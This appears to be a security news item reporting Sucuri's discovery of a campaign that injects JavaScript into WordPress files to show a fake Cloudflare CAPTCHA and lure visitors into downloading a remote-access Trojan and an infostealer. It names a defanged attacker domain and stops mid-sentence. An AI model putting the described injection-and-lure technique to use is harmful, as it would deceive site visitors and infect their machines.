Hackers use fake CloudFlare captcha to hide Trojan download

Sucuri is seeing the development of a campaign launched in August aimed at seeding the RAT in conjunction with a drive-by infostealer. Attackers inject JavaScript into WordPress sites, which displays a fake page of the Cloudflare security service and prompts the visitor to download some software to complete the check.

Malicious JavaScript injections are carried out by adding three lines of code to CMS core components, theme or plugin files. The number of sites infected in the course of new attacks is small – less than 1,000; in almost half of the cases, the unsolicited appendage was found in /wp-includes/js/jquery/jquery.min.js.

Previously, this script downloaded the content it needed to work (at the time, a fake Cloudflare DDoS protection warning) from the adogeevent[.]com domain. The new JavaScript variants request different domains, although the IP address remains the same.

Downloadable content has also changed. Now, a potential victim is presented with a CAPTCHA dialogue, supposedly pulled from the Cloudflare server.

Hackers use fake CloudFlare captcha to hide Trojan download

Hackers use fake CloudFlare captcha to hide Trojan download

When you enter any value in the specified field (even the correct one), a hint pops up: to gain access to the site,

Read more

Explore the site

More from the blog

Latest News